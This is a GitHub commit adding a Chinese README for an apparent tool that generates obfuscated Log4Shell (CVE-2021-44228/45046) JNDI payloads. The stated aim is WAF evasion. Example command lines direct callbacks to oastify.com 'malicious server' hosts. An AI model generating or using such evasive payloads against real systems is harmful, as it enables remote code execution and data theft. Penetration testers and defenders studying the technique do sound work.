Skip to content

Commit 16e0c44

Browse files
r3kind1er3kind1e
committed
Create README-CN.md
新增中文的自述文件
1 parent 6b9df33 commit 16e0c44

File tree

1 file changed

+70
-0
lines changed

1 file changed

+70
-0
lines changed

README-CN.md

Lines changed: 70 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,70 @@
1+
# Log4Shell-obfuscated-payloads-generator
2+
Log4Shell-obfuscated-payloads-generator可以生成初级混淆的或二级混淆的CVE-2021-44228或CVE-2021-45046 payloads,以规避WAF检测。
3+
4+
## 安装
5+
```
6+
git clone https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator.git
7+
```
8+
9+
Log4Shell-obfuscated-payloads-generator在任何平台上都可以在Python 3.x版本中开箱即用。
10+
11+
## Usage
12+
要获取基本选项列表,请使用:
13+
14+
```
15+
python3 Log4Shell-obfuscated-payloads-generator.py -h
16+
```
17+
18+
要获取使用示例,请使用:
19+
20+
```
21+
python3 Log4Shell-obfuscated-payloads-generator.py -hh
22+
```
23+
24+
## Screenshots
25+
`-h`: 获取基本选项列表
26+
![help](img/help.png)
27+
28+
`-hh`: 获取使用示例
29+
![usage-examples](img/usage-examples.png)
30+
31+
使用单个选项生成有效负载,`-s`选项指定恶意服务器:
32+
```
33+
--generate-primary-obfuscated-cve-2021-44228-payload 8 -s ck0pf4l6fmq4w0v17o7t894txk3arz.oastify.com
34+
```
35+
![primary44228](img/primary44228.png)
36+
![burp-collaborator-client1](img/burp-collaborator-client1.png)
37+
38+
```
39+
--generate-primary-obfuscated-cve-2021-45046-payload 4 -s x53a0p6r07bphlgms9setupei5owcl.oastify.com
40+
```
41+
![primary45046](img/primary45046.png)
42+
43+
```
44+
--generate-secondary-obfuscated-cve-2021-44228-payload 5 -s oia1rpap41mhxkp6rdbbywit1k7avz.oastify.com
45+
```
46+
![secondary44228](img/secondary44228.png)
47+
![burp-collaborator-client2](img/burp-collaborator-client2.png)
48+
49+
```
50+
--generate-secondary-obfuscated-cve-2021-45046-payload 5 -s 3vzg44n4hgzwaz2l4soqbbv8ezkq8f.oastify.com
51+
```
52+
![secondary45046](img/secondary45046.png)
53+
54+
使用多个选项来生成有效负载,`-s` 选项指定了恶意服务器:
55+
```
56+
--generate-primary-obfuscated-cve-2021-44228-payload 4 --generate-secondary-obfuscated-cve-2021-44228-payload 4 -s exfr6fpfjr17ca4w63q1dmxjgam2ar.oastify.com
57+
```
58+
![primary44228secondary44228](img/primary44228secondary44228.png)
59+
60+
如果不使用`-s`选项指定恶意服务器,`{{callback_host}}`占位符将保留在生成的有效负载中:
61+
```
62+
--generate-primary-obfuscated-cve-2021-44228-payload 3
63+
```
64+
![primary44228-without-server](img/primary44228-without-server.png)
65+
```
66+
--generate-primary-obfuscated-cve-2021-45046-payload 3 --generate-secondary-obfuscated-cve-2021-45046-payload 7
67+
```
68+
![primary45046secondary45046](img/primary45046secondary45046.png)
69+
70+
**TODO: Log4Shell-obfuscated-payloads-generator的设计思路将在5月20日之后发布。**

0 commit comments

Comments
 (0)